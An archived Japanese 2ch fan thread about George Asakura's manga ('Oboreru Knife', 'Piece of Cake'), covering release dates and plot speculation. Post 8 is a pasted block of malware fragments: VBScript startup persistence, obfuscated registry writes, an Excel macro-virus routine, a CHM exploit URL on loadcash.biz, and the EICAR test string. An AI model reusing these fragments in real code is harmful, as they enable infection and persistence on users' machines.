2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ピースオブケイク】ジョージ朝倉 第7ジャバ【溺れるナイフ】

1 :花と名無しさん:2007/01/07(日) 00:08:41 ID:???0
勢いにまかせて突っ走る青春の悪あがき。
純愛で激情の不思議キャラがなぜかリアルなジョージ朝倉について語るスレです。

前スレ
【ピースオブケイク】ジョージ朝倉 第6ジャバ【溺れるナイフ】
http://comic7.2ch.net/test/read.cgi/gcomic/1153321596/l50

ジョージ朝倉の公式(一応)サイト
ttp://www.jazze7.com/

「恋文日和」映画公式HP
ttp://www.koibumi.jp/

2 :花と名無しさん:2007/01/07(日) 00:09:35 ID:???0
過去スレ

【ピースオブケイク】ジョージ朝倉 第5ジャバ【溺れるナイフ】
http://comic6.2ch.net/test/read.cgi/gcomic/1141297217/

【ポンチ】ジョージ朝倉 第4ジャバ【溺れるナイフ】
http://comic6.2ch.net/test/read.cgi/gcomic/1124086715/

【恋文】ジョージ朝倉 第3ジャバ【溺れるナイフ】
http://comic6.2ch.net/test/read.cgi/gcomic/1098609139/

【恋文】ジョージ朝倉 第2ジャバ【ロマンス】
http://comic6.2ch.net/test/read.cgi/gcomic/1066558214/

☆☆☆ジョージ朝倉☆☆☆
http://comic.2ch.net/test/read.cgi/gcomic/1018715967/
(02/04/14〜02/04/17?:html化待ち)

ジョージ朝倉
http://comic.2ch.net/gcomic/kako/1020/10205/1020526720.html
(02/05/05〜02/11/11)

*:.。.★.。..ジョージ朝倉ってどうよ?..。.★.。.:*
http://comic.2ch.net/test/read.cgi/gcomic/1039332719/

3 :花と名無しさん:2007/01/07(日) 00:10:49 ID:???0
既刊コミックス、連載情報

【講談社発行コミックス】
カラオケ・バカ一代 (絶版)
水蜜桃の夜
バラが咲いた
恋文日和1〜3巻(以下続刊)
少年少女ロマンス 全3巻
溺れるナイフ 1〜4巻
ハッピーエンド(300ページ描きおろし)
ほんとうに本気の恋(別フレ作家によるオムニバス)

【祥伝社発行コミックス】
カラオケバカ一代
ハートを打ちのめせ!全2巻
ハートを打ちのめせ!全2巻 限定パック
ピース オブ ケイク 1〜3巻

【小学館発行コミックス】
平凡ポンチ 全4巻


●ピース オブ ケイク フィール・ヤング(祥伝社)で連載中
●溺れるナイフ 別冊フレンド(講談社)で連載中

4 :花と名無しさん:2007/01/07(日) 00:25:34 ID:???0
お疲れさまジャバ!

5 :花と名無しさん:2007/01/07(日) 01:09:24 ID:???0
>>1
乙!

ピースは読んだあとかなり鬱になるからダメだ・・・、と思っていても続き気になって読んでまう。



6 :花と名無しさん:2007/01/07(日) 04:49:25 ID:???O
1ありがd


7 :花と名無しさん:2007/01/07(日) 06:36:05 ID:???0
>>1乙華麗

8 :花と名無しさん:2007/01/07(日) 22:09:18 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

9 :花と名無しさん:2007/01/07(日) 23:15:13 ID:???O
ぅぉぉぉぉおおおおおおおアゲ┗(;`ロ′)┛アゲぉぉぉぉおおおおおおお

10 :花と名無しさん:2007/01/08(月) 04:28:48 ID:???O
>>1

>>9
大丈夫?

11 :花と名無しさん:2007/01/09(火) 16:20:42 ID:???0
1000 名前: 花と名無しさん [sage] 投稿日: 2007/01/09(火) 15:58:48 ID:???0
1000なら今年でナイフ終了

12 :花と名無しさん:2007/01/09(火) 21:20:43 ID:???0
gdgdになる位なら、今年中に終わっても良いや

13 :花と名無しさん:2007/01/10(水) 17:27:14 ID:???O
ナイフ
次はちゃんとした話
期待してもいいのかなぁ。

14 :花と名無しさん:2007/01/10(水) 17:42:41 ID:oKyLICkeO
ちゃんとした話?今どうなってるか知らないけど、
失速してんの?不幸でも構わないから加速して欲しいなあ

15 :花と名無しさん:2007/01/10(水) 23:24:02 ID:arsadouP0
>13はカナ視点の番外編の事をさしtるんじゃまいか?
本編は4ヶ月ほど休載中かと


16 :花と名無しさん:2007/01/10(水) 23:48:52 ID:QhP3yUNdO
絵だけ見てかわかみじゅんこの漫画かと思った

17 :花と名無しさん:2007/01/11(木) 00:13:47 ID:???O
ハッピーエンド読んだことある?どう思う?

18 :花と名無しさん:2007/01/11(木) 00:19:03 ID:???O
>>17
良いよ。
だけど、あれはジョージは、頭でしかわかってないんだと思う。
あのハッピーエンドに自分自身でもまだ納得がいかないからマンガを描き続けてるような
気がするな。

19 :花と名無しさん:2007/01/11(木) 08:16:23 ID:???O
ナイフ、今月の別フレから再開だっけ?
もう一ヶ月休みだっけ?

20 :花と名無しさん:2007/01/11(木) 22:50:55 ID:???0
あれ、確か今月から再開だったような…気がする

21 :花と名無しさん:2007/01/12(金) 08:27:14 ID:???O
今日別フレ買って来る(*´ω`*)

22 :花と名無しさん:2007/01/12(金) 11:22:24 ID:???O
ナイフ再開は来月から。
今月の予告やばい…ナイフが楽しみで仕方がない

23 :花と名無しさん:2007/01/12(金) 12:33:29 ID:???O
バラが咲いたってどう?読む価値有り?

24 :花と名無しさん:2007/01/12(金) 13:02:20 ID:???0
>>22
詳しく

25 :花と名無しさん:2007/01/12(金) 13:24:02 ID:???O
>>24
ネタバレになるかもしれないからあまり詳しく書けないが、
中学3年生からの話になる模様。
夏芽とコウの危うい恋!←きになる

26 :花と名無しさん:2007/01/12(金) 13:34:47 ID:???0
>>25
thx!
いきなり中3からかー て事は実は物語は終盤に向かってたりして・・・

27 :花と名無しさん:2007/01/12(金) 14:45:33 ID:???0
関係をせまると、あなたは紳士じゃないといわれる
関係をせまらないと、あなたは男じゃないといわれる

たびたび部屋を訪れると、もっと1人の時間がほしいといわれる
あまり部屋を訪れないと、二股かけているのかといわれる

はやりのカッコいい服を着ると、あなたって流行にふりまわされて軽薄といわれる
はやりのカッコいい服を着ないと、あなたってダサダサで恥ずかしいといわれる

話を聞きながら発言すると、黙って聞いてよといわれる
話を黙って聞いていると、なにか言ってよといわれる

待ち合わせに30分遅れていくと、30分も待たせるなんてひどいといわれる
自分が30分遅れると、30分ぐらいなによといわれる

やきもちをやくと、しばられるのはいやという
やきもちをやかないと、もう愛はないのかという

そうだねと賛成すると、自分の考えがない人ねといわれる
そうじゃないと反対すると、理解がない人ねといわれる

愛してるよと言うと 口の軽い人ねと言われる
大好きだよと言うと それだけしか言えないのと言われる

墓に供え物をすると 君は無視する
僕は泣いているのに 君は安らかに笑っている

28 :花と名無しさん:2007/01/12(金) 15:45:01 ID:???O
ん?

29 :花と名無しさん:2007/01/12(金) 23:39:37 ID:???O
中3か!
こうちゃんと夏芽はまったく関係なくなってるのかなぁ?ってかこうちゃんは年上とまだ付き合ってるのかー?

30 :花と名無しさん:2007/01/12(金) 23:46:12 ID:???O
>>27
ガク((((゚Д゚;)))))ブル

31 :花と名無しさん:2007/01/13(土) 01:28:03 ID:???O
早く次読みたくて読みたくて体かゆくなりそう

32 :花と名無しさん:2007/01/13(土) 12:22:20 ID:Ax5jD1Ru0
夏芽の母ちゃんっておもいっきり梶芽衣子でつね。
修羅雪姫みたいな漫画描いて欲しいよ。

33 :花と名無しさん:2007/01/13(土) 17:06:46 ID:???O
タランティーノ食い付いてくれるかなww

34 :花と名無しさん:2007/01/13(土) 22:51:07 ID:???0
うがああ!気になるー!


35 :花と名無しさん:2007/01/14(日) 00:14:19 ID:???O
別フレって毎月13日発売ですか?
今日本屋になかった〜

36 :花と名無しさん:2007/01/14(日) 16:35:47 ID:???O
>>35
13日ですよ(^ω^)

>>22
禿同!!
予告カットのこうちゃんの後姿…まじ切ない!

あんな1つの絵でここまで切なく続き読みたくさせるジョージに乾杯。

37 :花と名無しさん:2007/01/14(日) 19:41:42 ID:???O
次回キュンとさせてくれジョージ‥‥

38 :花と名無しさん:2007/01/14(日) 20:24:10 ID:???O
ナイフ5巻はいったいいつになるんだろ

39 :花と名無しさん:2007/01/14(日) 21:38:15 ID:???0
5巻は来月。
密林見ると、5巻いつもより10円高いけど
カラー入ったりページ多かったりするのかな?
それともKC全部値上がりしてんのかな。

40 :花と名無しさん:2007/01/14(日) 21:54:57 ID:???0
KC値上がりとか・・・orz
ページ数多くなったとかそういう関係なら大歓迎なんだけどな。

41 :花と名無しさん:2007/01/15(月) 00:17:16 ID:???O
>>25
次回には夏芽よりコウちゃんの方が背ェ高くなってたりしてね

42 :花と名無しさん:2007/01/15(月) 10:25:10 ID:???0
>>41
いいね、それ。一気にコウちゃんが男らしく見えるかも。

43 :花と名無しさん:2007/01/15(月) 11:54:32 ID:???O
コウちゃん彼女と別れていろんな女と遊んでそう

44 :花と名無しさん:2007/01/15(月) 14:14:58 ID:???0
いや!むしろ一匹狼化してたりして

45 :花と名無しさん:2007/01/15(月) 14:26:17 ID:???O
夏芽は大物女優とかになってんやろかー

46 :花と名無しさん:2007/01/15(月) 20:05:14 ID:???O
ワッ……ワカパイ
(〃ω〃)

47 :花と名無しさん:2007/01/15(月) 21:19:36 ID:???0
>>46
もしもワカパイになっていたら、コウちゃんに揉ませてあげるのかなぁ…(^・ω・^)

48 :花と名無しさん:2007/01/15(月) 21:23:55 ID:???0
コウちゃんと夏芽はエッチしないで終わりそうだ

49 :花と名無しさん:2007/01/15(月) 21:39:13 ID:???O
いや?するな!
しなきゃ!

50 :花と名無しさん:2007/01/15(月) 23:08:33 ID:???O
するしないの前にさ、
夏芽は生涯ひんにゅ(ry

51 :花と名無しさん:2007/01/15(月) 23:24:20 ID:???0
>>39
講談社のコミック値上がりしたみたいだよ…



52 :花と名無しさん:2007/01/16(火) 04:08:13 ID:???O
夏芽はアキ監督に撮ってもらうの(T-T)

53 :花と名無しさん:2007/01/16(火) 05:54:13 ID:zYdQEV820
溺れるナイフなんて、意味深なタイトルをつけている位だから
話がどう転ぼうと、ハッピーエンドは待ってないような気がする。。。

そろそろ夏芽にはナイフらしい行動を期待したい。

54 :花と名無しさん:2007/01/16(火) 07:03:51 ID:???O
>>53
夏芽は1巻からナイフそのものじゃないか

55 :花と名無しさん:2007/01/16(火) 08:00:02 ID:???0
でも付き合いだしたころとか切れ味悪くなった時もあったね

56 :花と名無しさん:2007/01/16(火) 11:23:12 ID:???0
>>51
_| ̄|○ついに値上がり・・・

57 :花と名無しさん:2007/01/16(火) 13:20:40 ID:???O
中3になったらまたナイフっぽくなってるかしら

58 :花と名無しさん:2007/01/16(火) 20:29:49 ID:???O
付き合うまでの夏芽はナイフそのもの
でもその実態はドMだった
コウちゃんにはドSを期待してるんだけど(神様だからね!)

コウちゃんこそ実はM男で、夏芽はコウちゃんに勝手に理想を求めていましたって
話にならないかな、なってほしいな。

59 :花と名無しさん:2007/01/16(火) 20:36:38 ID:???O
編隊?

60 :花と名無しさん:2007/01/17(水) 01:41:03 ID:???0
>>58
実際にそういう関係性で付き合ったことがあるけど
恋愛としてはものすごい破綻してナイフどころの鋭利さじゃなかった
だからできれば他の展開がいいなぁ

61 :花と名無しさん:2007/01/17(水) 06:52:55 ID:???O
>>60
だからこそ(溺れる)なんじゃないかなあと。
俺男だけど、俺もこれで地獄見たから。

62 :花と名無しさん:2007/01/17(水) 09:30:46 ID:XB1frxCTO
それより、あの変態男が出所した後を心配しなきゃ。

63 :花と名無しさん:2007/01/17(水) 12:59:27 ID:???0
コミクス派だから解らないんだけど変態男って今獄中なの?
示談を持ちかけて夏芽パパンに塩振られたのは知ってるけど

64 :花と名無しさん:2007/01/18(木) 00:05:15 ID:???0
本誌でもそこまではまだ語られてないと思ったけど。

っていうかジョージ早く休み明けて

65 :花と名無しさん:2007/01/18(木) 00:56:31 ID:???O
示談っぽいよねー
夏芽心配だー!
またなんかがあって今度はコウチャンが助けてくれるとかなのかな??

66 :花と名無しさん:2007/01/18(木) 01:02:04 ID:???O
それはなさそう…
でも夏芽に事件を思い出させないために、夏芽から身をひいたわけだけど、それ以外にも期待を裏切って夏芽をガッカリさせたことも自ら離れた理由っぽいし。次になんかあったらちゃんと助けてくれそう

67 :花と名無しさん:2007/01/18(木) 08:46:11 ID:GkObF1IY0
浮雲町の言葉って広島弁なのかな?

68 :花と名無しさん:2007/01/18(木) 14:33:45 ID:???0
多分。

69 :花と名無しさん:2007/01/18(木) 16:20:32 ID:???0
なつめがナイフなの?コウちゃんかと思ってた。


70 :花と名無しさん:2007/01/18(木) 16:28:01 ID:???0
十代の自意識がナイフでしょ?

71 :花と名無しさん:2007/01/18(木) 16:52:27 ID:???0
あーそうか。納得。

72 :花と名無しさん:2007/01/18(木) 21:30:59 ID:???O
夏芽がナイフでしょ。
まあみんなナイフっちゃあナイフなんだけど・・・

73 :花と名無しさん:2007/01/18(木) 21:34:21 ID:???0
まあジョージは>>70のつもりでつけたってコミックス巻末にかいてるけど
考え方は読んでる皆さんそれぞれに任すって言ってるから
この際自分が思うものでいいのでは?

74 :花と名無しさん:2007/01/18(木) 23:16:46 ID:???O
大友の絡みはもうないのか?一度も光らないまま完結かな。

75 :花と名無しさん:2007/01/19(金) 01:52:04 ID:???O
たしかに!
大友ともっと絡むかとおもった

76 :花と名無しさん:2007/01/19(金) 21:17:06 ID:???O
中1で夏芽と大友が同じクラスってのが、今後起こるなにかしらの状線かと思いきや‥‥

もうすっかり中3か

77 :花と名無しさん:2007/01/20(土) 05:45:30 ID:???O
安易な三角関係ものは他の漫画でお腹いっぱい。
ナイフに限ってはもっと違う手方や切口から、10代における悲喜交交を描いていってほしいけどな。

78 :花と名無しさん:2007/01/20(土) 09:02:08 ID:???O
だね。もう夏芽はこうなったらとことん悲劇のヒロインをやってほしい

79 :花と名無しさん:2007/01/21(日) 18:27:34 ID:???O
悲劇のヒロインもんなんていらん。

80 :花と名無しさん:2007/01/21(日) 20:23:43 ID:???O
買うんとダウン開始!

81 :花と名無しさん:2007/01/22(月) 22:34:15 ID:klSCLKdMO
休載大過ぎ

82 :花と名無しさん:2007/01/22(月) 22:42:56 ID:???0
そろそろ弛んできたね

83 :花と名無しさん:2007/01/23(火) 03:40:20 ID:???O
夏芽には読み手が応援したくなるようなヒロインでいてほしいよ。

84 :花と名無しさん:2007/01/23(火) 20:26:24 ID:???O
読み切り見たい(´・ω・`)

85 :花と名無しさん:2007/01/23(火) 21:55:29 ID:???O
恋文はもぅやらんのかし?

86 :花と名無しさん:2007/01/24(水) 11:48:49 ID:???0
アカデミー賞ノミネートされたバベルの主演女優、
劇中の菊地凛子が恋文3巻のメタルムーンの瀬々にそっくりだと思った
雰囲気っていうか顔立ちがジョージの描く女子ぽい。
アカデミー賞に出た金髪の菊池は雰囲気皆無だけど

87 :花と名無しさん:2007/01/24(水) 16:00:03 ID:???0
フィッテっていう雑誌の今月号に出てる栗山千秋が、
個人的にイメージしてたミカにすごく似てる
やっぱりミカは栗山千秋しかいない!って思った
別に映画化でも何でもないけどさ

88 :花と名無しさん:2007/01/24(水) 19:54:48 ID:???0
ミカって何に出てた子だったっけ?
思い出せん…

89 :花と名無しさん:2007/01/24(水) 20:07:56 ID:???0
>>88
平凡ポンチ

ああ、確かに空気にてるなぁー

90 :花と名無しさん:2007/01/24(水) 23:09:13 ID:???0
ジョージ栗山好きそう。何となく。
前にナツメの写真集は栗山の写真集が元ネタじゃないかというレスもあったし。
サブカル系?な雰囲気が共通してるよな。
神秘的でエキセントリックな美少女。

91 :花と名無しさん:2007/01/24(水) 23:26:08 ID:???0
モデルでさ、ナイフ好きなコいないかなぁ
そんなコいたら好きになりそうだ

18 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)